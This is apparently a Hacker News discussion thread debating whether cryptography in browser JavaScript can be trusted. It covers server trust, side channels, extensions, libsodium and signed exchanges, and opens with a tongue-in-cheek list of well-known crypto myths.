The author of that second one is a frequent HN commentator. Let me attempt to summon him to this thread to see if he has anything more to say, since that was written in 2011 so might be a bit out date.
Begin summoning ritual...
• It's easy to secure email with GPG.
• DNSSEC is a state of the art design that you should adopt on your website as soon as possible, to make up for the deficiencies of TLS.
• You should use /dev/random for most cryptographic random number generation on Linux. /dev/urandom is only good for things where security doesn't matter.
Mostly. Just today I saw that the Arch Wiki is perpetuating the myth of /dev/urandom being insecure for crypto keys.
They even link to your and my writeup, but warn against mine, since it "contains fallacies".
The debate is never going to be decisively "won". Fortunately, enough holdouts have been convinced (Ruby, the kernel man page writers), so that the damage isn't as high anymore.
Something culinary is missing... you should pour those big-corporate MGP Whiskeys down the drain and get something from a small distillery. Or sous-vide is overrated, just a way to have plastic seep into your dinner.
Browser crypto has come a long way. With libraries like libsodium and proper implementation I think it’s drastically better than at the time of those articles (2013 and 2011).
Source: we also write encryption libraries and have a free implementation of our browser sdk at https://share.labs.tozny.com
No, it's not drastically better than it was in 2013.
People have done lots of things with browser cryptography, that's true. But none of what they've done addresses or mitigates the central flaw of browser javascript cryptography, which is that to use it, you have to continuously and durably trust the server. If you're doing that, you might as well just do the cryptography serverside.
The issue of having to trust the server also applies in a lot of non-browser cases. For example, I have to trust the 1Password update server, or forego 1Password updates.
It looks like the issues with browser-based cryptography from those two articles fall into three broad groups.
1. You have to trust the server.
2. The browsers don't do a good job of letting a site's JavaScript keep things secret from other things running in the browser.
3. If you implement cryptography in JavaScript, you are probably going to screw it up. There's a lot more to doing it right than just knowing to use AES and whatever the currently favored hash function is.
#1 is probably acceptable in a lot of cases, and #3 can probably be addressed by using the Webassembly version of libsodium.That leaves #2 as the apparently insurmountable issue.
Suppose the user was willing to create a separate Firefox or Chrome profile just for using my web-based app, and did not install any browser plug-ins under that profile, set its home page to my app page, and never used that profile to visit any other sites.
The issue of having to trust the server also applies in a lot of non-browser cases. For example, I have to trust the 1Password update server, or forego 1Password updates.
These are not quite the same kinds of trust - nearly every request to a compromised web app server is an opportunity to inject malicious code and malicious UI and compromise the clientside part of the app.
Compromising a software update server doesn't necessarily get you any of that - for instance, your 1Password client will presumably verify the authenticity of the update before it applies it.
I don't think the private methods proposal will help with cryptography at all. The "security" it provides boils down to making it difficult for code outside the class to access the value, like you can already do with closures like this:
function makeCounter() {
var x = 0;
return function() { return ++x; };
}
It doesn't help at all with side-channel attacks, which are the main reason why it's hard to safely perform cryptographic operations in a just-in-time interpreted language like JavaScript. It also doesn't stop rogue scripts on the same page from pulling the user's passwords/keys right out of the password field, URL bar, localStorage, or wherever else your script gets them from.
the central flaw of browser javascript cryptography, which is that to use it, you have to continuously and durably trust the server
What do you think of doing JavaScript Crypto in a browser extension? An extension runs code in the browser without persistent trust of a server (at least in the traditional webapp way; you have to persistently trust the extension update server, extension authors, chrome update server, etc). You could do things like quickly, interactively encrypt chunks of text with a symmetric key. Presumably you'd use an extension UI to enter your keys, to avoid keylogging.
I think it would be illuminating to have a small suite of well-implemented cryptographic primitives, curated by a well-known expert, installed and ready to use on any string in the browser.
(BTW why don't we see more random chunks of cyphertext everywhere? It would seem to me a good channel, to use a combination of public forums to transfer short bursts of cyphertext. Where are the encrypted Twitter broadcasts??)
The issue with browser extensions, is that you are not far away from the common hurdles of developing, using and releasing a "real" desktop/mobile application. Having nothing to install and landing on a page that just works, is a big plus for you users.
I wonder why browsers don't build their own browser api for file and mail crypto ... and that way you don't have to trust the server. And you can verify that the server is using browser crypto.
There's no difference between trusting the server to deliver Javascript cryptography source code and trusting the server with your secrets. The server can just deliver code (in a number of different ways) to compromise those secrets.
My understanding from the Apple/FBI fiasco is that it's an open question whether the US government is legally able to compel you to write and deliver custom code to your clients. But any local judge can issue you a warrant to hand over encrypted customer data that you're holding the key to.
But IANAL, maybe my take on that is overly simplistic.
Actually, Filekit is meant to be integrated into an application, and that application is responsible for delivering JS and handling identities, not the Tanker server.
Interestingly, the technology of Signed HTTP Exchanges could potentially be used as the basis for a system that removes the need to trust the server. The current Internet-Draft even includes a section on the Binary Transparency use case:
What's still missing, I think, is a way for a publisher to tell a browser "Only run new code from this domain after checking that the user is happy to upgrade". That would put the "web app" on roughly the same security footing as a desktop application with a built-in update system.
Wondering...browsers do seem to be able to do secure crypto in two existing scenarios: when presenting a client TLS certificate; and when performing authentication via WebAuthn in conjunction with U2F. Would it be possible to re-purpose either of those mechanisms to do other potentially useful secure crypto (e.g. sign blockchain transactions)?
I don't see how you have to trust the server unless it's also serving the client bundle. There are many decentralized use cases where you might "bring your own client" (or maybe one trusted server gives it to you) and use the client to interact with other untrusted servers.
You can have a trusted client and an untrusted server.
This doesn't seem to be doing downloading in a streaming manner, as indicated by its use of my old "file-saver"[1] library. Edit: Originally thought this also did encryption without streaming.
Nowadays I would recommend using Penumbra[2] (another library I've worked on) with StreamSaver.js for streaming file encryption/decryption/downloading.
I had to do a little digging into where it was pulling its crypto methods from and it looks like the have a bit of their own library, but it uses libsodium via javascript wrappers underneath:
So, I guess take that as you will. I haven't read much of the actual source yet.
edit: I sort of expected there would be a move to the server since it looks like they built their library to run on the server, even if it's running all of the libsodium methods in javascript but it's definitely pulling the browser version and running it all in the client: https://github.com/TankerHQ/sdk-js/blob/master/packages/file...
JavaScript itself is quite safe, more so if it's running isolated like in a browser. Trusting your data to a piece of JavaScript code sent by a remote server, though, is only as safe as the server.
The "safety" being discussed here isn't system integrity, but rather cryptographic side channel safety, which is very much an open question in Javascript.
it's not so "isolated" - running Javascript in a page can be examined and potentially altered from a number of vectors (probably the simplest is extensions).
AFAIK there's no way of running JS in a browser that is "safe" in the crypto sense.
Also https://www.nccgroup.trust/us/about-us/newsroom-and-events/b...